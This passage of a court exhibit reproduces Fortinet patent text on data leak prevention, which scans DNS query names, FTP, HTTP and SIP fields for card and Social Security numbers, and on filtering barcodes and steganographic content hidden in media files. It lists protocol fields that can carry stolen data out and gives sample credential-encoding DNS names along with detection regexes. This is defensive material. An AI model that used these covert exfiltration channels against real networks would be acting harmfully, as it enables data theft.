Further examples of requests that may be used for data leakage are FTP control commands that are sent from an FTP client to an FTP server, including, but not limited to, a make a directory command, a download command and an upload command. Data leak scanning by existing DLP systems will not be triggered by such FTP control commands because the these commands were designed/intended for a purpose other than sending data or information in the form of a message or a file to the server.

Additional examples of requests that may be used for data leakage are telnet protocol commands. Some telnet commands contain one or more parameters that may be crafted to contain sensitive information.

In order to prevent data leakage through requests or commands that are not specifically designed or intended to carrying messages or files, the request or command contained in the data packet may be identified by request decoder **302** for data leak checking/scanning/analysis.

Next, a field extractor **303** may be used for parsing one or more fields of the request or command that are identified by request decoder **302**. In network communication, each request or command has a format that is defined by the corresponding protocol. The request or command may contain a header and a data portion. The header and data portion may have multiple fields that may have a fixed or variable length. Based on each protocol, requests or commands that have or do not enough space to carry sensitive information and requests or commands that have fields that may be utilized for data leakage may be identified. Therefore, field extractor **303** may extract one or more fields that may contain enough space for hiding sensitive information from a request based on the corresponding protocol of the data packet. For example, a DNS packet may be parsed based on various Requests for Comments (RFCs), for example, defining the DNS protocol. Table 1 shows the structure of a DNS query message header.

TABLE 1

| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Message ID | | | | | | | | | | | | | | | |
| QR | OPCODE | | | | AA | TC | RD | RA | res1 | res2 | res3 | RCODE | | | |
| QDCOUNT (No. of items in Question Section) | | | | | | | | | | | | | | | |
| ANCOUNT (No. of items in Answer Section) | | | | | | | | | | | | | | | |
| NSCOUNT (No. of items in Authority Section) | | | | | | | | | | | | | | | |
| ARCOUNT (No. of items in Additional Section) | | | | | | | | | | | | | | | |

Table 2 shows the structure of a DNS question section.

TABLE 2

| Field Name | Meaning/Use |
|---|---|
| QNAME | The domain name being queried |
| QTYPE | The resource records being requested |
| QCLASS | The Resource Record(s) class being requested e.g. internet, chaos etc. |

As shown in Table 2, the QNAME field of the DNS query request may have enough space for carrying sensitive information. Therefore, in one embodiment, the QNAME field of a DNS query request is extracted for data leak scanning use of the DNS protocol is detected.

Next, the field that is extracted by field extractor **303** or the whole request that is identified by request decoder **302** may be scanned by sensitive information filter **304** based on sensors **306**. According to one embodiment, each sensor of sensors **306** is defined by the network administrator of the gateway and may include a regular expression of the sensitive information or a string that should be matched in the content of the requests or command. The following are exemplary regular expressions that may be used to identify the existence of a credit card number or a social security number within a field:

Visa Credit Card Numbers:

^4[0-9]{12}(?:[0-9]{3})?$

Master Card Credit Card Numbers:

^5[1-5][0-9]{14}$

Social Security Number (SSN):

^([[:digit:]] {3}[-][[:digit:]]{2}[-][[:digit:]]{4}|[[:digit:]]{9})$

Each sensor may also include or otherwise be associated with an action that should be applied to the traffic if the string or regular expression is matched. The different actions may be defined based on the sensitivity levels of the data. For the most sensitive data leak, the traffic may be blocked. Other actions, such as logging or passing the data traffic may be taken for less sensitive data. The action may be applied by action module **305** when a sensor is matched. In other embodiments of the present invention, one or more additional or alternative data identification methodologies (predefined or defined or configurable by the network administrator) may be used in place of or to supplement regular expressions including, but not limited to, content registration, contextual analysis, keywords, lexicons, extended regular expressions, meta data tags, Bayesian analysis, statistical analysis, machine learning and the like.

FIG. **4** is a flow diagram illustrating a method for Data Leak Prevention (DLP) in a private network in accordance with an embodiment of the present invention. Depending upon the particular implementation, the various process and decision blocks described below may be performed by hardware components, embodied in machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with the instructions to perform the steps, or the steps may be performed by a combination of hardware, software, firmware and/or involvement of human participation/interaction.

At block **401**, a data packet is received by a gateway, such as gateway **112** shown in FIGS. **1** and **2**.

At block **402**, the data packet is decoded by a DLP engine of the gateway to identify an upper layer protocol that the data packet is using. The protocol may be determined based on the destination port of the data packet. Alternatively or additionally, information contained in the protocol field of the IP packet may be considered.

At block **403**, the DLP engine may determine if the protocol should be checked for potential data leakage. In one embodiment, the network administrator of the gateway may configure a rule that defines a list of those of the upper layer protocols that should be checked. For example, a list of candidate protocols may be provided via a control panel user interface and the network administrator may select those of the listed protocols that are to be subjected to DLP scanning. If the protocol is not among those to be checked for data leakage, processing continues with block **409** and the gateway may pass the data packet. If the protocol is determined to be among those to be checked for data leakage, processing branches to block **404**.

At block **404**, the data packet is further decoded to identify one or more requests or commands of the upper layer protocol that are specified by the data packet. The requests/commands may be decoded based on defined message structures associated with the corresponding protocol. A non-limiting example of preventing data leakage through a DNS query request is described in detail below with reference to FIG. **5**.

At block **405**, the gateway may determine if the identified requests or commands should be scanned for data leakage. Usually, a few requests/commands of a protocol may contain parameters or fields that have enough space for carrying sensitive information although these requests/commands are not designed for transmission of messages or files. The gateway may maintain a list of these requests/commands for each upper layer protocol. The list may be predefined or configurable by the network administrator through a control panel interface, for example. Table 3 provides a non-limiting list of exemplary requests/commands that are not specifically defined for transmission of messages or files but which may nonetheless be misused by malware to send sensitive information out of a network.

TABLE 3

| Protocol | Request/command | Field |
|---|---|---|
| Any | Authentication | User-ID/Password |
| DNS | DNS query | QNAME |
| FTP | MD | directory |
| FTP | GET | File Name |
| FTP | PUT | File Name |
| HTTP | GET | URL |
| SIP | INVITE | VIA |
| SIP | INVITE | FROM |
| SIP | INVITE | CALL-ID |
| . . . | | |

If the request/command does not need to be checked, processing branches to block **409** and the data packet is allowed to pass through the gateway. If the request should be checked, processing continues with block **406**.

At block **406**, the gateway may determine if one or more particular fields of the request/command should be extracted for data leak scanning. In one embodiment, the whole data packet or the whole request/command may be scanned for data leakage. For example, if the request is unencrypted or the DLP system does not need to know which field of the request is utilized by the malware to convey sensitive or confidential information, processing continues with block **408** and the entire data packet may be scanned to identify potential data leakage. It is also possible that the entire data packet or request is scanned first. If a data leakage is found in the data packet, then, the field of the request in which sensitive information is found may be extracted and reported to the network administrator. In another embodiment, the gateway may run in a deep scan mode where a particular field that is not specifically designed for transmission of a message or a file but is capable of carrying sensitive information is extracted for data leak scanning. A non-limiting list of exemplary fields is listed in Table 3.

At block **407**, one or more particular fields that may be utilized for carrying sensitive information may be extracted from the request/command by a protocol parser based on the data structure defined by the associated protocol. The particular fields may include, but is not limited to, the fields listed in Table 3 and a dedicated protocol parser may be used for analyzing the data packet and extracting one or more particular fields of a request/command of an upper layer protocol. In some embodiments, if the data packet at issue is encrypted, it may be decrypted by a decryption unit before extracting the field. For example, if the request is secured with secure sockets layer (SSL), the data packet may be first decrypted by an SSL proxy. Then, the decrypted data packet may be processed to identify the request/command of the data packet and a particular field may be extracted from the decrypted data packet.

At block **408**, the request/command or a particular field of the request is scanned by the DLP engine for any sensitive information. Key words or regular expressions of sensitive information may be defined and stored in sensors of the gateway by the network administrator. The DLP engine may detect data leak by matching the request or a field of the request with key words or regular expressions of the sensors. One or more additional or alternative data identification methodologies (predefined or defined or configurable by the network administrator) may be used in place of or to supplement regular expressions and key words including, but not limited to, content registration, contextual analysis, lexicons, extended regular expressions, meta data tags, Bayesian analysis, statistical analysis, machine learning and the like. If no match is found by the DLP engine (meaning no sensitive or confidential information has been identified to be contained within the data packet at issue), the data packet is passed by the gateway at block **409**. If a match is found in the request (meaning sensitive or confidential information has been identified to be contained within the data packet at issue), an action associated with the corresponding sensor by the network administrator is taken by the gateway. For example, the data packet may be dropped or a warning message identifying the detected data leakage may be sent to the network administrator. Additionally or alternatively, an event and/or the data packet or a portion thereof may be recorded in a log for further inspection.

FIG. **5** is a flow diagram illustrating a method for Data Leak Prevention (DLP) in a private network in accordance with another embodiment of the present invention. In this embodiment, a DNS query request is scanned in order to prevent sensitive information from being sent to a compromised DNS server through a DNS query.

At block **501**, a DNS query request is received by a DLP engine of a gateway. The request is sent by a DNS client within a private network to a DNS server that is outside the private network. A DNS query request may include one or more domain names for which IP addresses are being queried. As noted in the Background, malware may encode sensitive or confidential information in a form that would otherwise appear to be a valid domain name format, such as 8888-8888-8888-0001.com, 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.com, passsword.user-id.com or user-id.password.com. Although such a domain name may not be translated to an IP address by the DNS server, the sensitive information may be logged or parsed by a compromised DNS server.

At block **502**, a protocol parser of the DLP engine may extract one or more domain name strings contained in the QNAME field of the DNS query request.

At block **503**, the domain name strings may be matched with sensors configured by a network administrator, for example, to check if any sensitive information is contained therein.

At block **504**, if sensitive information is found in the domain name strings, an action associated with the matched sensor is taken so that data leakage through the DNS query request may be prevented and/or brought to the attention of the network administrator.

At block **505**, if sensitive information is not found, the DNS query request is passed through the gateway.

FIG. **6** is an example of a computer system **600** with which embodiments of the present disclosure may be utilized. Computer system **600** may represent or form a part of a network security appliance, a server or a client workstation.

Embodiments of the present disclosure include various steps, which will be described in more detail below. A variety of these steps may be performed by hardware components or may be tangibly embodied on a computer-readable storage medium in the form of machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with instructions to perform these steps. Alternatively, the steps may be performed by a combination of hardware, software, and/or firmware.

As shown, computer system **600** includes a bus **630**, a processor **605**, communication port **610**, a main memory **615**, a removable storage media **640**, a read only memory **620** and a mass storage **625**. A person skilled in the art will appreciate that computer system **600** may include more than one processor and communication ports.

Examples of processor **605** include, but are not limited to, an Intel® Itanium® or Itanium 2 processor(s), or AMD® Opteron® or Athlon MP® processor(s), Motorola® lines of processors, FortiSOC™ system on a chip processors or other future processors. Processor **605** may include various modules associated with embodiments of the present invention.

Communication port **610** can be any of an RS-232 port for use with a modem based dialup connection, a 10/100 Ethernet port, a Gigabit or 10 Gigabit port using copper or fiber, a serial port, a parallel port, or other existing or future ports. Communication port **610** may be chosen depending on a network, such a Local Area Network (LAN), Wide Area Network (WAN), or any network to which computer system **600** connects.

Memory **615** can be Random Access Memory (RAM), or any other dynamic storage device commonly known in the art. Read only memory **620** can be any static storage device(s) such as, but not limited to, a Programmable Read Only Memory (PROM) chips for storing static information such as start-up or BIOS instructions for processor **605**.

Mass storage **625** may be any current or future mass storage solution, which can be used to store information and/or instructions. Exemplary mass storage solutions include, but are not limited to, Parallel Advanced Technology Attachment (PATA) or Serial Advanced Technology Attachment (SATA) hard disk drives or solid-state drives (internal or external, e.g., having Universal Serial Bus (USB) and/or Firewire interfaces), such as those available from Seagate (e.g., the Seagate Barracuda 7200 family) or Hitachi (e.g., the Hitachi Deskstar 7K1000), one or more optical discs, Redundant Array of Independent Disks (RAID) storage, such as an array of disks (e.g., SATA arrays), available from various vendors including Dot Hill Systems Corp., LaCie, Nexsan Technologies, Inc. and Enhance Technology, Inc.

Bus **630** communicatively couples processor(s) **605** with the other memory, storage and communication blocks. Bus **630** can be, such as a Peripheral Component Interconnect (PCI)/PCI Extended (PCI-X) bus, Small Computer System Interface (SCSI), USB or the like, for connecting expansion cards, drives and other subsystems as well as other buses, such a front side bus (FSB), which connects processor **605** to system memory.

Optionally, operator and administrative interfaces, such as a display, keyboard, and a cursor control device, may also be coupled to bus **630** to support direct operator interaction with computer system **600**. Other operator and administrative interfaces can be provided through network connections connected through communication port **610**.

Removable storage media **640** can be any kind of external hard-drives, floppy drives, IOMEGA® Zip Drives, Compact Disc-Read Only Memory (CD-ROM), Compact Disc-Re-Writable (CD-RW), Digital Video Disk-Read Only Memory (DVD-ROM).

Components described above are meant only to exemplify various possibilities. In no way should the aforementioned exemplary computer system limit the scope of the present disclosure.

While embodiments of the present invention have been illustrated and described, it will be clear that the invention is not limited to these embodiments only. Numerous modifications, changes, variations, substitutions, and equivalents will be apparent to those skilled in the art, without departing from the spirit and scope of the invention, as described in the claims.

What is claimed is:

**1**. A data leak prevention (DLP) method comprising:

receiving from a network administrator, by a network security appliance within a private network, (i) information defining a DLP rule to be applied by the network security appliance to packets associated with an upper layer protocol and (ii) information defining an action to take when one or more conditions associated with the DLP rule are satisfied, wherein the packets are originated within the private network and addressed to a destination residing outside of the private network and wherein the DLP rule is defined in terms of one or more of a regular expression and a string that are configured to detect existence of one or more forms of sensitive information carried by the packets;

receiving, by the network security appliance, a packet originated by a host device within the private network and directed to a destination device outside of the private network;

determining, by the network security appliance, the received packet is associated with the upper layer protocol;

identifying, by the network security appliance, a command, request or method of the upper layer protocol that is specified by or represented by the received packet;

scanning, by the network security appliance, the received packet for sensitive information by applying the DLP rule to one or more fields of the command, request or method, wherein the command, request or method is not designed or intended to carry data or information in a form of a message or file to a target of the command, request or method;

when the scanning results in a conclusion that the sensitive information is contained within the received packet, then performing, by the network security appliance, the defined action;

wherein the one or more forms of sensitive information comprise a payment card number or a social security number;

wherein the regular expression detects a format and type of content corresponding to a credit card number associated with a particular payment processing provider or the social security number; and

wherein the regular expression comprises:

^4[0-9]{12}(?:[0-9]{3})?$;

^5[1-5][0-9]{14}$; or

^([[:digit:]]{3}[-][[:digit:]]{2}[[:digit:]]{4}|[[:digit:]]{9})$.

**2**. The method of claim **1**, wherein the upper layer protocol comprises domain name system (DNS) protocol, wherein the command, request or method comprises a DNS query request and wherein the one or more fields comprise a name field of the DNS query request.

**3**. The method of claim **1**, wherein the command, request or method comprises an authentication request and the one or more fields comprise a user name or password field of the authentication request.

**4**. The method of claim **1**, wherein the upper layer protocol comprises hypertext transfer protocol (HTTP), wherein the command, request or method comprises an HTTP GET method and the one or more fields comprise a uniform resource identifier (URI) of the HTTP GET method.

**5**. The method of claim **1**, wherein the upper layer protocol comprises file transfer protocol (FTP), wherein the command, request or method comprises an FTP command associated with directory operation and wherein the one or more fields comprise a directory field of the FTP command.

**6**. The method of claim **1**, wherein the upper layer protocol comprises file transfer protocol (FTP), wherein the command, request or method comprises an FTP command associated with a file download or a file upload operation and wherein the one or more fields comprise a file name field of the FTP command.

**7**. The method of claim **1**, wherein the upper layer protocol comprises telnet protocol, wherein the command, request or method comprises a telnet command having at least one parameter and wherein the one or more fields comprise the at least one parameter.

**8**. A non-transitory program storage device readable by a network security appliance, tangibly embodying a program of instructions executable by one or more computer processors of the network security appliance to perform a method of data leak prevention (DLP), the method comprising:

receiving from a network administrator (i) information defining a DLP rule to be applied by the network security appliance to packets associated with an upper layer protocol and (ii) information defining an action to take when one or more conditions associated with the DLP rule are satisfied, wherein the packets are originated within a private network protected by the network security appliance and addressed to a destination residing outside of the private network and wherein the DLP rule is defined in terms of one or more of a regular expression and a string that are configured to detect existence of one or more forms of sensitive information carried by the packets;

receiving a packet originated by a host device within the private network and directed to a destination device outside of the private network;

determining the received packet is associated with the upper layer protocol;

identifying a command, request or method of the upper layer protocol that is specified by or represented by the received packet;

scanning the received packet for sensitive information by applying the DLP rule to one or more fields of the command, request or method, wherein the command, request or method is not designed or intended to carry data or information in a form of a message or file to a target of the command, request or method;

when the scanning results in a conclusion that the sensitive information is contained within the received packet, then performing the defined action;

wherein the one or more forms of sensitive information comprise a payment card number or a social security number;

wherein the regular expression detects a format and type of content corresponding to a credit card number associated with a particular payment processing provider or the social security number; and

wherein the regular expression comprises:

^4[0-9]{12}(?:[0-9]{3})?$;

^5[1-5][0-9]{14}$; or

^([[:digit:]]{3}[-][[:digit:]]{2}[-][[:digit:]]{4}|[[:digit:]]{9})$.

**9**. The non-transitory program storage device of claim **8**, wherein the upper layer protocol comprises domain name system (DNS) protocol, wherein the command, request or method comprises a DNS query request and wherein the one or more fields comprise a name field of the DNS query request.

**10**. The non-transitory program storage device of claim **8**, wherein the command, request or method comprises an authentication request and the one or more fields comprise a user name or password field of the authentication request.

**11**. The non-transitory program storage device of claim **8**, wherein the upper layer protocol comprises hypertext transfer protocol (HTTP), wherein the command, request or method comprises an HTTP GET method and the one or more fields comprise a uniform resource identifier (URI) of the HTTP GET method.

**12**. The non-transitory program storage device of claim **8**, wherein the upper layer protocol comprises file transfer protocol (FTP), wherein the command, request or method comprises an FTP command associated with directory operation and wherein the one or more fields comprise a directory field of the FTP command.

**13**. The non-transitory program storage device of claim **8**, wherein the upper layer protocol comprises file transfer protocol (FTP), wherein the command, request or method comprises an FTP command associated with a file download or a file upload operation and wherein the one or more fields comprise a file name field of the FTP command.

**14**. The non-transitory program storage device of claim **8**, wherein the upper layer protocol comprises telnet protocol, wherein the command, request or method comprises a telnet command having at least one parameter and wherein the one or more fields comprise the at least one parameter.

* * * * *

# APPENDIX F

US009660958B2

(12) **United States Patent**
**Yan et al.**

(10) **Patent No.: US 9,660,958 B2**
(45) **Date of Patent: *May 23, 2017**

(54) **FILTERING HIDDEN DATA EMBEDDED IN MEDIA FILES**

(71) Applicant: **Fortinet, Inc.**, Sunnyvale, CA (US)

(72) Inventors: **Guoyi Yan**, Foster City, CA (US); **Juneng Zheng**, Fremont, CA (US)

(73) Assignee: **Fortinet, Inc.**, Sunnyvale, CA (US)

( * ) Notice: Subject to any disclaimer, the term of this patent is extended or adjusted under 35 U.S.C. 154(b) by 0 days.

This patent is subject to a terminal disclaimer.

(21) Appl. No.: **15/224,516**

(22) Filed: **Jul. 30, 2016**

(65) **Prior Publication Data**

US 2016/0337316 A1 Nov. 17, 2016

**Related U.S. Application Data**

(63) Continuation of application No. 15/132,879, filed on Apr. 19, 2016, now Pat. No. 9,419,998, which is a continuation of application No. 14/266,762, filed on Apr. 30, 2014, now Pat. No. 9,319,384.

(51) **Int. Cl.**
***H04L 29/06*** (2006.01)
***H04N 1/32*** (2006.01)

(52) **U.S. Cl.**
CPC ........ ***H04L 63/0245*** (2013.01); ***H04L 63/145*** (2013.01); ***H04L 63/1416*** (2013.01); ***H04L 63/1425*** (2013.01); ***H04L 63/20*** (2013.01); ***H04N 1/32352*** (2013.01); *H04L 63/1408* (2013.01)

(58) **Field of Classification Search**
None
See application file for complete search history.

(56) **References Cited**

U.S. PATENT DOCUMENTS

| | | | |
|---|---|---|---|
| 8,789,174 B1 | 7/2014 | Gupta |
| 9,319,384 B2 | 4/2016 | Yan et al. |
| 9,419,998 B1 | 8/2016 | Yan et al. |
| 2003/0149890 A1 | 8/2003 | Shen |
| 2005/0234875 A1 | 10/2005 | Auerbach |
| 2008/0310629 A1 | 12/2008 | Van Der Veen |
| 2013/0311776 A1 | 11/2013 | Besehanic |
| 2013/0311780 A1 | 11/2013 | Besehanic |
| 2015/0319138 A1 | 11/2015 | Yan et al. |
| 2016/0234228 A1 | 8/2016 | Yan et al. |

OTHER PUBLICATIONS

Non-Final Rejection for U.S. Appl. No. 14/266,762 mailed Nov. 6, 2015.
Notice of Allowance for U.S. Appl. No. 14/266,762 mailed Mar. 11, 2016.
Notice of Allowance for U.S. Appl. No. 15/132,879 mailed Jul. 11, 2016.

*Primary Examiner* — Amir Mehrmanesh
(74) *Attorney, Agent, or Firm* — Hamilton, DeSanctis & Cha LLP

(57) **ABSTRACT**

Systems and methods for filtering unsafe content at a network security appliance are provided. According to one embodiment, a network security appliance captures network traffic and extracts a media file from the network traffic. The network security appliance then determines the presence of a hidden data item embedded in the media file in a machine-readable form. When such a hidden data item is identified, the network security appliance performs one or more actions on the media file based on a predefined security policy.

**16 Claims, 6 Drawing Sheets**




Branch Office Network 121
Branch Office Network 122
PC 123
Mobile Phone 124
Internet 130
Headquarters Network 110
Firewall 112
Local Server 111a
PC 111b
Laptop 111c
Mobile Phone 111d

FIG. 1


Start
201
Capture network traffic
202
Extract a media file from the network traffic
203
Pre-match a signature of the media file
204
Check plain text of a hidden data item of the media file
205
The hidden data item is safe?
No
206
Block the media file or warn the user
Yes
End

FIG. 2


Start
301
Generate a signature of the media file
302
Check the signature in a signature DB
303
Signature found?
Yes
304
Block the media file or warn the user
Yes
End

FIG. 3


Start
401
Identify plain text of the hidden data item
402
Scan the text based on a local database
403
Scan the text based on a remote database
404
Hidden data item is safe?
405
Block the media file or warn the receiver
End

FIG. 4


Firewall 500
IPS 520
Hidden Data Detector 530
Media File DB 531
Signature DB 534
Signature Pre-match Module 533
Signature Generating Module 532
Content Policy Registry 537
Content Control Module 536
Decoding Module 535
Media Extracting Module 521
Network Module 540
Sender 510
Receiver 550

FIG. 5

Case 2:25-cv-00098-JRG Document 67-3 Filed 03/31/26 Page 189 of 433 PageID #: 7499






FIG. 6

# FILTERING HIDDEN DATA EMBEDDED IN MEDIA FILES

## CROSS-REFERENCE TO RELATED APPLICATIONS

This application is a continuation of U.S. patent application Ser. No. 15/132,879, filed Apr. 19, 2016, now U.S. Pat. No. 9,419,998, which is a continuation of U.S. patent application Ser. No. 14/266,762, filed Apr. 30, 2014, now U.S. Pat. No. 9,319,384, both of which are hereby incorporated by reference in their entirety for all purposes.

## COPYRIGHT NOTICE

Contained herein is material that is subject to copyright protection. The copyright owner has no objection to the facsimile reproduction of the patent disclosure by any person as it appears in the Patent and Trademark Office patent files or records, but otherwise reserves all rights to the copyright whatsoever. Copyright© 2014-2016, Fortinet, Inc.

## BACKGROUND

Field

Embodiments of the present invention generally relate to the field of network security techniques. In particular, various embodiments relate to hidden data identification and methods for filtering media files that are embedded with malware, spam or sensitive information.

Description of the Related Art

A barcode is an optical machine-readable representation of data. Linear or one-dimensional (1D) barcodes represent data by varying the width of and spacing between parallel lines or rectangles. Two dimensions (2D) barcodes use dots, hexagons and other geometric patterns to represent data. A unit of a 2D barcode, such as a matrix barcode or Quick Response (QR) code, may represent more than 1K bytes of data depending upon the version and encoding employed. A QR code that encodes text, music, images, Uniform Resource Locators (URLs) and/or emails can be generated as an image file and transmitted through short message service (SMS) and/or multimedia messaging service (MMS) or via the Internet. Barcode reader utility software running on a computing device, such as a smart phone, may scan a barcode by a camera connected to or integrated within the computing device. The barcode reader decodes the encoded content and then may show the content.

Some barcode reader utility software may carry out further operations based on the type of encoded content. For example, when the encoded content includes or represents a URL, the barcode reader utility software may launch a web browser and open the URL directly (via URL redirection, for example, which allows QR codes to send metadata to existing applications on the device running the barcode reader utility software). It is convenient for a smart phone user to open a web page by scanning a barcode instead of typing in the URL manually. As such, QR codes have become more prevalent as part of product/service advertising strategies targeting mobile-phone users via mobile tagging. Personal information or business cards may also be encoded within 2D barcodes (e.g., QR codes) and can be printed out or transmitted through a network.

Other ways to embed hidden content in media files include digital watermarking and steganography. Digital watermarking is a kind of marker covertly embedded in a noise-tolerant signal such as audio or image data. Digital



watermarks are only perceptible under certain conditions, i.e., after using some algorithm, and are otherwise imperceptible to human senses. Both steganography and digital watermarking employ steganographic techniques to embed data covertly in noisy signals but remain imperceptible to human senses. Digital watermarks may be used to verify the authenticity or integrity of the carrier signal or to show the identity of its owner. It is prominently used for tracing copyright infringements and for banknote authentication.

As media files may carry encoded and hidden data that are imperceptible to human senses, some malware use these techniques to intrude into user devices or transfer sensitive information. For example, a malicious web site may distribute a barcode that contains its URL to smart phone users and induce the users to scan or decode the barcode. After the smart phone decodes the barcode, the smart phone may launch its web browser and open the malicious website. The website may contain malware that can, among other things, gain access and/or control of the smart phone, disrupt operation of the smart phone and/or gather sensitive information stored on or entered into the smart phone (e.g., usernames and passwords entered into apps and/or websites).

In view of the foregoing, there exists a need for methods and system that can resist the spread of media files containing malware or sensitive information embedded therein in human imperceptible form.

## SUMMARY

Systems and methods for filtering unsafe content at a network appliance are provided. According to one embodiment, a network security appliance (e.g., a firewall) captures network traffic exchanged between a sender and a recipient and extracts a media file from the network traffic. The network security appliance then determines the presence of a hidden data item embedded in the media file in a machine-readable form. When such a hidden data item is identified, the network security appliance performs one or more actions on the media file based on a predefined security policy.

Other features of embodiments of the present invention will be apparent from the accompanying drawings and from the detailed description that follows.

## BRIEF DESCRIPTION OF THE DRAWINGS

Embodiments of the present invention are illustrated by way of example, and not by way of limitation, in the figures of the accompanying drawings and in which like reference numerals refer to similar elements and in which:

FIG. **1** illustrates an exemplary network architecture in accordance with an embodiment of the present invention.

FIG. **2** is a flow diagram illustrating a method for scanning a media file containing human imperceptible content at a security device in accordance with an embodiment of the present invention.

FIG. **3** is a flow diagram illustrating a method for checking human imperceptible content by comparing a signature of a media file in accordance with an embodiment of the present invention.

FIG. **4** is a flow diagram illustrating a method for checking human imperceptible content by decoding the human imperceptible content in accordance with an embodiment of the present invention.

FIG. **5** illustrates exemplary functional units of a security device in accordance with an embodiment of the present invention.

FIG. **6** is an exemplary computer system in which or with which embodiments of the present invention may be utilized.

## DETAILED DESCRIPTION

Systems and methods for filtering unsafe content at a network appliance are provided. According to one embodiment, a network appliance captures network traffic and extracts a media file from the network traffic. The network appliance then determines if a hidden data item is embedded in the media file in a machine-readable form. The hidden data item may be a barcode, a digital watermark or other steganographic data containing encoded data that is imperceptible to human senses. The network security appliance takes appropriate action on the media file when such a hidden data item is found in the network traffic.

In the following description, numerous specific details are set forth in order to provide a thorough understanding of embodiments of the present invention. It will be apparent, however, to one skilled in the art that embodiments of the present invention may be practiced without some of these specific details. In other instances, well-known structures and devices are shown in block diagram form.

Embodiments of the present invention include various steps, which will be described below. The steps may be performed by hardware components or may be embodied in machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with the instructions to perform the steps. Alternatively, the steps may be performed by a combination of hardware, software, firmware and/or by human operators.

Embodiments of the present invention may be provided as a computer program product, which may include a machine-readable storage medium tangibly embodying thereon instructions, which may be used to program a computer (or other electronic devices) to perform a process. The machine-readable medium may include, but is not limited to, fixed (hard) drives, magnetic tape, floppy diskettes, optical disks, compact disc read-only memories (CD-ROMs), and magneto-optical disks, semiconductor memories, such as ROMs, PROMs, random access memories (RAMs), programmable read-only memories (PROMs), erasable PROMs (EPROMs), electrically erasable PROMs (EEPROMs), flash memory, magnetic or optical cards, or other type of media/machine-readable medium suitable for storing electronic instructions (e.g., computer programming code, such as software or firmware). Moreover, embodiments of the present invention may also be downloaded as one or more computer program products, wherein the program may be transferred from a remote computer to a requesting computer by way of data signals embodied in a carrier wave or other propagation medium via a communication link (e.g., a modem or network connection).

In various embodiments, the article(s) of manufacture (e.g., the computer program products) containing the computer programming code may be used by executing the code directly from the machine-readable storage medium or by copying the code from the machine-readable storage medium into another machine-readable storage medium (e.g., a hard disk, RAM, etc.) or by transmitting the code on a network for remote execution. Various methods described herein may be practiced by combining one or more machine-readable storage media containing the code according to the present invention with appropriate standard computer hardware to execute the code contained therein. An apparatus for practicing various embodiments of the present invention may involve one or more computers (or one or more processors within a single computer) and storage systems containing or having network access to computer program(s) coded in accordance with various methods described herein, and the method steps of the invention could be accomplished by modules, routines, subroutines, or subparts of a computer program product.



Notably, while embodiments of the present invention may be described using modular programming terminology, the code implementing various embodiments of the present invention is not so limited. For example, the code may reflect other programming paradigms and/or styles, including, but not limited to object-oriented programming (OOP), agent oriented programming, aspect-oriented programming, attribute-oriented programming (@OP), automatic programming, dataflow programming, declarative programming, functional programming, event-driven programming, feature oriented programming, imperative programming, semantic-oriented programming, functional programming, genetic programming, logic programming, pattern matching programming and the like.

## TERMINOLOGY

Brief definitions of terms used throughout this application are given below.

The terms "connected" or "coupled" and related terms are used in an operational sense and are not necessarily limited to a direct connection or coupling. Thus, for example, two devices may be coupled directly, or via one or more intermediary media or devices. As another example, devices may be coupled in such a way that information can be passed there between, while not sharing any physical connection with one another. Based on the disclosure provided herein, one of ordinary skill in the art will appreciate a variety of ways in which connection or coupling exists in accordance with the aforementioned definition.

As used herein, the term "hidden" generally refers to something that is imperceptible to human senses. Examples of hidden data items or content include, but are not limited to, data encoded within digital watermarks, steganography, 1D barcodes and/or 2D barcodes. While 1D and 2D barcodes are perceptible by the human sense of vision, the encoded content embedded therein is not perceptible by human senses and requires the assistance of decoding software. As such, as used herein "hidden data items" and "hidden content" include data (e.g., numeric alphanumeric, binary and/or kanji data) encoded within digital watermarks, steganography, 1D barcodes, 2D barcodes and/or other optical labels or representations of data.

The phrases "in an embodiment," "according to one embodiment," and the like generally mean the particular feature, structure, or characteristic following the phrase is included in at least one embodiment of the present disclosure, and may be included in more than one embodiment of the present disclosure. Importantly, such phrases do not necessarily refer to the same embodiment.

If the specification states a component or feature "may", "can", "could", or "might" be included or have a characteristic, that particular component or feature is not required to be included or have the characteristic.

The phrase "media file" generally refers to a file containing image, audio and/or video data.

The phrase "network security appliance" generally refers to a specialized or dedicated device for use on a network in virtual or physical form. Some network appliances are implemented as general-purpose computers with appropriate

software configured for the particular functions to be provided by the network appliance; others include custom hardware (e.g., one or more custom Application Specific Integrated Circuits (ASICs)). Examples of functionality that may be provided by a network appliance include, but is not limited to, Layer 2/3 routing, content inspection, content filtering, firewall, traffic shaping, application control, Voice over Internet Protocol (VoIP) support, Virtual Private Networking (VPN), IP security (IPSec), Secure Sockets Layer (SSL), antivirus, intrusion detection, intrusion prevention, Web content filtering, spyware prevention and anti-spam. Examples of network appliances include, but are not limited to, network gateways and network security appliances (e.g., FORTIGATE family of network security appliances and FORTICARRIER family of consolidated security appliances), messaging security appliances (e.g., FORTIMAIL family of messaging security appliances), database security and/or compliance appliances (e.g., FORTIDB database security and compliance appliance), web application firewall appliances (e.g., FORTIWEB family of web application firewall appliances), application acceleration appliances, server load balancing appliances (e.g., FORTIBALANCER family of application delivery controllers), vulnerability management appliances (e.g., FORTISCAN family of vulnerability management appliances), configuration, provisioning, update and/or management appliances (e.g., FORTIMANAGER family of management appliances), logging, analyzing and/or reporting appliances (e.g., FORTIANALYZER family of network security reporting appliances), bypass appliances (e.g., FORTIBRIDGE family of bypass appliances), Domain Name Server (DNS) appliances (e.g., FORTIDNS family of DNS appliances), wireless security appliances (e.g., FORTIWIFI family of wireless security gateways), FORIDDOS, wireless access point appliances (e.g., FORTIAP wireless access points), switches (e.g., FORTISWITCH family of switches) and IP-PBX phone system appliances (e.g., FORTIVOICE family of IP-PBX phone systems).

